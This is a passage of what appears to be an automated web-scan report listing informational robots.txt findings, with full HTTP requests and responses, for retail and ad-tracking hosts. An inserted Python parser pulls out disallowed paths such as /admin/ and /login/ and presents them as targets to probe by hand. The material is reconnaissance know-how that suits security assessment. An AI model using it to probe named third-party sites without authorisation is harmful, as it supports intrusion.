P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 16 May 2011 01:56:38 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

22.55. http://rpt.footlocker.com/eluminate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rpt.footlocker.com
Path:   /eluminate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rpt.footlocker.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "3a991c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=970
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.56. http://rs.instantservice.com/resources/smartbutton/7664/44640/available.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.instantservice.com
Path:   /resources/smartbutton/7664/44640/available.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:21 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 14:43:25 GMT
ETag: "1a-443ebd40"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

22.57. http://s.petco.com/js_raw/mtagconfig.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.petco.com
Path:   /js_raw/mtagconfig.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.petco.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Aug 2010 21:52:58 GMT
ETag: "bc6b7cbbb135cb1:107a"
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
X-Strangeloop: RCache
X-SL-RCache: Cached
Date: Mon, 16 May 2011 01:57:24 GMT
Content-Length: 267
Connection: close
Set-Cookie: sltest=T; path=/; domain=petco.com.

# Spider instructions for all web servers in the production pool
# Thu, 11 Dec 2008 06:18:00 -0400


# Exclude Files From All Robots:

User-agent: *
Disallow: /secure/
Disallow: /cart/
Disa
...[SNIP]...

22.58. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

22.59. https://secure.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.bhphotovideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 03:06:15 GMT
ETag: "491-4d9fcd27"
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:17:41 GMT
Content-Length: 1169
Connection: close

User-agent: *
Disallow: /c/search*
Disallow: /search*
Disallow: /federal
Disallow: */edu
Disallow: /c/find/
Disallow: /impact/
Disallow: /find/organizational-sales.jsp*
Disallow: /find/gsa.jsp
Disallo
...[SNIP]...

22.60. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.homedepot.ca
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Mar 2011 16:39:36 GMT
Content-Type: text/plain
Date: Mon, 16 May 2011 02:10:40 GMT
Content-Length: 379
Connection: close
Cache-Control: max-age=315360000
Expires: Mon, 10 May 2021 11:15:19 GMT

User-agent: *

Disallow: /webapp/wcs/stores/servlet/DisplayTemplate?storeId=10051&catalogId=10051&langId=-15&display=services_holmes
Disallow: /webapp/wcs/stores/servlet/DisplayTemplate?storeId=10051&
...[SNIP]...

22.61. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:54:22 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.62. http://server.bhphotovideo.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.bhphotovideo.com
Path:   /cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: server.bhphotovideo.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "4f7b4-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=954
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.63. http://shop.pacsun.com/home.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.pacsun.com
Path:   /home.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shop.pacsun.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 Jun 2008 19:20:11 GMT
Accept-Ranges: bytes
Content-Length: 208
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:58:44 GMT
Connection: close

# robots.txt for http://shop.pacsun.com/

User-agent: *
Disallow: /assets
Disallow: /checkout
Disallow: /includes
Disallow: /user
Disallow: / assets
Disallow: / checkout
Disallow: / includes
Disallow:
...[SNIP]...

22.64. http://srv.clickfuse.com/pixels/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.clickfuse.com
Path:   /pixels/create.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: srv.clickfuse.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 02:03:00 GMT
ETag: "500df-1a-496ec5f4a5d80"
Last-Modified: Wed, 08 Dec 2010 20:57:42 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

22.65. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Mon, 16 May 2011 10:34:09 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.66. http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.bhphotovideo.com
Path:   /FrameWork/css/min/reset-fonts-layout.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.bhphotovideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 03:06:15 GMT
ETag: "491-4d9fcd27"
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:53:00 GMT
Content-Length: 1169
Connection: close

User-agent: *
Disallow: /c/search*
Disallow: /search*
Disallow: /federal
Disallow: */edu
Disallow: /c/find/
Disallow: /impact/
Disallow: /find/organizational-sales.jsp*
Disallow: /find/gsa.jsp
Disallo
...[SNIP]...

22.67. http://subscriptions.marvel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:32 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 13:58:57 GMT
ETag: "38-74744a40"
Accept-Ranges: bytes
Content-Length: 56
Vary: Accept-Encoding
X-ServerNickName: Mj
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent:    *
Disallow: /confirm/
Disallow: /checkout/

22.68. https://subscriptions.marvel.com/checkout/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriptions.marvel.com
Path:   /checkout/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:25 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 14:02:04 GMT
ETag: "38-7f99af00"
Accept-Ranges: bytes
Content-Length: 56
Vary: Accept-Encoding
X-ServerNickName: Venom
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent:    *
Disallow: /confirm/
Disallow: /checkout/

22.69. http://sv.liveclicker.net/service/api

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /service/api

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sv.liveclicker.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:03 GMT
Server: Apache
Last-Modified: Thu, 25 Jun 2009 13:05:29 GMT
ETag: "111db5-2b-e0c6f840"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /service/

22.70. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x2214 8724
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

22.71. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.p.mybuys.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:45 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Mon, 14 Mar 2011 13:58:26 GMT
ETag: "1008136-1c-49e71b4a44480"-gzip
Accept-Ranges: bytes
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Content-Type: text/plain; charset=UTF-8
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

User-agent: *
Disallow: /

22.72. http://tag.admeld.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Thu, 12 May 2011 13:43:17 GMT
ETag: "5abfba-1a-4a3145f192740"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 16 May 2011 01:56:46 GMT
Connection: close

User-agent: *
Disallow: /

22.73. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.searchignite.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: track.searchignite.com

Response

HTTP/1.1 200 OK
Content-Length: 52
Content-Type: text/plain
Last-Modified: Thu, 31 Aug 2006 14:18:42 GMT
Accept-Ranges: bytes
ETag: "bbd5705c8cdc61:1fd7"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:32 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /SI/CM/

22.74. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tracking.searchmarketing.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 39
Content-Type: text/plain
Last-Modified: Fri, 10 Dec 2010 21:52:28 GMT
Accept-Ranges: bytes
ETag: "441af89b498cb1:b93"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:41 GMT
Connection: close

# go away
User-agent: *
Disallow: /

22.75. http://trvlgrd.netmng.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trvlgrd.netmng.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trvlgrd.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:01 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 28 Feb 2011 12:34:42 GMT
ETag: "666ed-1a-49d56e768dc80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.76. http://uat.netmng.com/pixel/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /pixel/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: uat.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:38 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 28 Feb 2011 12:34:42 GMT
ETag: "666ed-1a-49d56e768dc80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.77. http://wasc.homedepot.ca/b/ss/homedepotca/1/H.22.1/s06511195921339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wasc.homedepot.ca
Path:   /b/ss/homedepotca/1/H.22.1/s06511195921339

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "6c5213-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www19
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.78. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.aisle7.net
Path:   /api/1.0/widgets/general/newswire-widget

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: web.aisle7.net

Response

HTTP/1.1 200 OK
Content-Length: 31
Content-Type: text/plain
Content-Location: http://web.aisle7.net/robots.txt
Last-Modified: Wed, 11 May 2011 22:12:19 GMT
Accept-Ranges: bytes
ETag: "b881607e2810cc1:f32"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:58:42 GMT
Connection: close
Set-Cookie: aisle7c6=4090937773.1.3050751040.2687628825; path=/

...User-agent: *
Disallow: /

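Added example, not part of the XSS.CX report and not code from any host listed in it: a small Python parser that turns a captured robots.txt body into what a tester actually wants from this finding. robots.txt is advisory, not an access control; a Disallow line is a list of paths the site owner did not want indexed (/admin/, /secure/, /checkout/, /Login/, /cgi-bin in the responses above), which is precisely the list to probe by hand. The parser also flags the quirks visible in this section: an empty "Disallow:" (nothing is disallowed), "Disallow: /" or "Disallow: *" (whole site), non-standard directives such as Noindex, a path with an embedded space ("Disallow: / assets" on shop.pacsun.com), and a leading UTF-8 byte-order mark, which is most likely what the "..." before User-agent in the web.aisle7.net response is. The sample body is constructed for the example; the hostname in its Sitemap line is a placeholder, and the INTERESTING keyword list is an assumed heuristic.

```python
"""Extract tester-relevant facts from captured robots.txt bodies (added example)."""
import re
from dataclasses import dataclass, field

# Directives defined by the Robots Exclusion Protocol (RFC 9309).
STANDARD = {"user-agent", "disallow", "allow", "sitemap"}

# Path fragments that usually mark functionality worth manual testing when a
# site asks crawlers to stay away from them. Assumed heuristic, not exhaustive.
INTERESTING = ("admin", "login", "secure", "checkout", "cart", "cgi-bin",
               "include", "preview", "api", "config", "backup")


@dataclass
class RobotsReport:
    groups: dict = field(default_factory=dict)       # agent -> [(directive, value)]
    disallowed: list = field(default_factory=list)   # (agent, path)
    allowed: list = field(default_factory=list)      # (agent, path)
    sitemaps: list = field(default_factory=list)
    nonstandard: list = field(default_factory=list)  # (directive, value), e.g. Noindex
    malformed: list = field(default_factory=list)    # raw lines a strict parser rejects
    interesting: list = field(default_factory=list)  # disallowed paths matching INTERESTING

    def disallows_root(self, agent="*"):
        """True when the group for `agent` blocks the whole site ('/' or '*')."""
        return any(a == agent and p in ("/", "*") for a, p in self.disallowed)


def parse_robots(body):
    """Parse a robots.txt body (bytes or str) into a RobotsReport."""
    if isinstance(body, bytes):
        # IIS commonly serves the file with a UTF-8 BOM; a strict parser then
        # fails to match the first User-agent line. utf-8-sig drops it.
        body = body.decode("utf-8-sig", errors="replace")
    rep = RobotsReport()
    agents = []              # user-agents of the group currently being filled
    expecting_agent = True   # consecutive User-agent lines share one group
    for raw in body.splitlines():
        line = raw.split("#", 1)[0].strip()   # comments run to end of line
        if not line:
            continue
        if ":" not in line:
            rep.malformed.append(raw)
            continue
        directive, value = (s.strip() for s in line.split(":", 1))
        directive = directive.lower()
        if directive == "user-agent":
            if not expecting_agent:
                agents = []                   # a rule was seen: new group starts
            agents.append(value)
            rep.groups.setdefault(value, [])
            expecting_agent = True
            continue
        if directive == "sitemap":
            rep.sitemaps.append(value)        # valid anywhere in the file
            continue
        if not agents:
            rep.malformed.append(raw)         # rule before any User-agent line
            continue
        expecting_agent = False
        for a in agents:
            rep.groups[a].append((directive, value))
        if directive not in STANDARD:
            rep.nonstandard.append((directive, value))
            continue
        # Only Disallow/Allow remain at this point.
        if value == "":
            continue                          # "Disallow:" = nothing disallowed
        if re.search(r"\s", value) or not value.startswith(("/", "*")):
            rep.malformed.append(raw)         # e.g. "Disallow: / assets"
            continue
        target = rep.disallowed if directive == "disallow" else rep.allowed
        for a in agents:
            target.append((a, value))
        if directive == "disallow" and any(k in value.lower() for k in INTERESTING):
            rep.interesting.append(value)
    return rep


# Constructed sample: patterns taken from the responses in this report, with a
# leading BOM and CRLF line endings as IIS would send them. Not a live fetch.
SAMPLE = (b"\xef\xbb\xbf# constructed sample\r\n"
          b"User-agent: *\r\n"
          b"Disallow: /admin/\r\n"
          b"Disallow: /secure/\r\n"
          b"Disallow: / assets\r\n"
          b"Disallow: /search*\r\n"
          b"Allow: /350/\r\n"
          b"Noindex: /\r\n"
          b"Sitemap: http://example.invalid/sitemap.xml\r\n"
          b"\r\n"
          b"User-agent: Googlebot\r\n"
          b"Disallow: /service/\r\n")

if __name__ == "__main__":
    r = parse_robots(SAMPLE)
    print("probe by hand :", r.interesting)
    print("non-standard  :", r.nonstandard)
    print("malformed     :", r.malformed)
    print("blocks all (*):", r.disallows_root())
```

Feed it the body of any robots.txt response in this section (the part after the blank line that ends the headers) rather than the whole HTTP message. The malformed list is worth reading as closely as the disallowed one: a path that a compliant crawler ignores ("/ assets") is still a real directory on the server, and a file that starts with a BOM may be silently ignored by tooling that does not strip it.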
22.79. http://www.acehardware.com/home/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "4e4490-1cd-4a17de6ae2900"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:54:36 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /coreg/
Disallow: /compare/
Disallow: /cart/
Disallow: /css/
Disallow: /checkout/
Disallow: /customHandler/
Disallow: /cartHandler/
Disallow: /fsrscripts/
Disallow: /Controll
...[SNIP]...

22.80. https://www.acehardware.com/coreg/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /coreg/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:28 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "4e4490-1cd-4a17de6ae2900"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:12:28 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /coreg/
Disallow: /compare/
Disallow: /cart/
Disallow: /css/
Disallow: /checkout/
Disallow: /customHandler/
Disallow: /cartHandler/
Disallow: /fsrscripts/
Disallow: /Controll
...[SNIP]...

22.81. http://www.armaniexchange.com/category/womens.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /category/womens.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:28 GMT
ETag: "22-9fd2a500"
Content-Type: text/plain
Cache-Control: max-age=5433
Expires: Mon, 16 May 2011 03:25:55 GMT
Date: Mon, 16 May 2011 01:55:22 GMT
Content-Length: 34
Connection: close

User-agent: *
Disallow: /admin/

22.82. https://www.armaniexchange.com/account/login.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.armaniexchange.com
Path:   /account/login.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:48 GMT
ETag: "22-a103d200"
Content-Type: text/plain
Cache-Control: max-age=14334
Expires: Mon, 16 May 2011 06:12:11 GMT
Date: Mon, 16 May 2011 02:13:17 GMT
Content-Length: 34
Connection: close

User-agent: *
Disallow: /admin/

22.83. http://www.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bhphotovideo.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 03:06:15 GMT
ETag: "491-4d9fcd27"
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:53:00 GMT
Content-Length: 1169
Connection: close

User-agent: *
Disallow: /c/search*
Disallow: /search*
Disallow: /federal
Disallow: */edu
Disallow: /c/find/
Disallow: /impact/
Disallow: /find/organizational-sales.jsp*
Disallow: /find/gsa.jsp
Disallo
...[SNIP]...

22.84. http://www.bluefly.com/__ssobj/ard.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /__ssobj/ard.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluefly.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:32 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 28 Apr 2011 14:44:20 GMT
ETag: "b825-3bd-4a1fb97a6d900"
Accept-Ranges: bytes
Content-Length: 957
Content-Type: text/plain
Set-Cookie: TLTHID=6BA402047F60107F2403A028ED8DE8C8; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6BA402047F60107F2403A028ED8DE8C8; Path=/; Domain=.bluefly.com
Set-Cookie: SSLB=0; path=/; domain=.bluefly.com
RTSS: 1
Keep-Alive: timeout=5, max=246
Connection: close
Set-Cookie: TS18d374=ef46fa3174a9a069b71be27f16ae4b15d543d56dccf397b04dd0857c; Path=/

User-agent: *
Allow: /
Disallow: /myfly/
Disallow: /myaccount/
Disallow: /cart/
Disallow: /browse/quickLogin.jsp
Disallow: /browse/pdpQuickAdd.jsp
Disallow: /browse/f_quick_buy.jsp
Disallow: /
...[SNIP]...

22.85. http://www.bluenile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluenile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 02:03:09 GMT
Content-Length: 1593
Content-Type: text/plain;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET


User-agent: *
Disallow: /emails/
Disallow: /login/
Disallow: /promos/
Disallow: /wwwcore/
Disallow: /images/
Disallow: /ai/
Disallow: /assets/
Disallow: /services/
Disallow: /rss/
Di
...[SNIP]...

22.86. https://www.brookstone.com/imageservlet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /imageservlet

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brookstone.com

Response

HTTP/1.0 200 OK
Server: BigIP
Connection: close
Content-Length: 49

# no bots allowed here
User-agent: *
Disallow: /

22.87. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.42.220.35
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.88. http://www.footlocker.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footlocker.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c68b248026c6104e682a5deea0e2727:1283874104"
Last-Modified: Tue, 07 Sep 2010 15:41:44 GMT
Accept-Ranges: bytes
Content-Length: 273
Content-Type: text/plain
Date: Mon, 16 May 2011 01:58:56 GMT
Connection: close
X-N: S

# Modified 09.07.10
User-agent: *
Disallow: /account/
Disallow: /wishlist/
Disallow: /catalog/shoppingCart/
Disallow: /catalog/emptyCart.cfm
Disallow: /shoppingcart/
Disallow: /checkout/
Disallow: /s7
...[SNIP]...

22.89. https://www.footlocker.com/account/default.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footlocker.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c68b248026c6104e682a5deea0e2727:1283874104"
Last-Modified: Tue, 07 Sep 2010 15:41:44 GMT
Accept-Ranges: bytes
Content-Length: 273
Content-Type: text/plain
Date: Mon, 16 May 2011 10:36:40 GMT
Connection: close
X-N: S

# Modified 09.07.10
User-agent: *
Disallow: /account/
Disallow: /wishlist/
Disallow: /catalog/shoppingCart/
Disallow: /catalog/emptyCart.cfm
Disallow: /shoppingcart/
Disallow: /checkout/
Disallow: /s7
...[SNIP]...

22.90. http://www.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
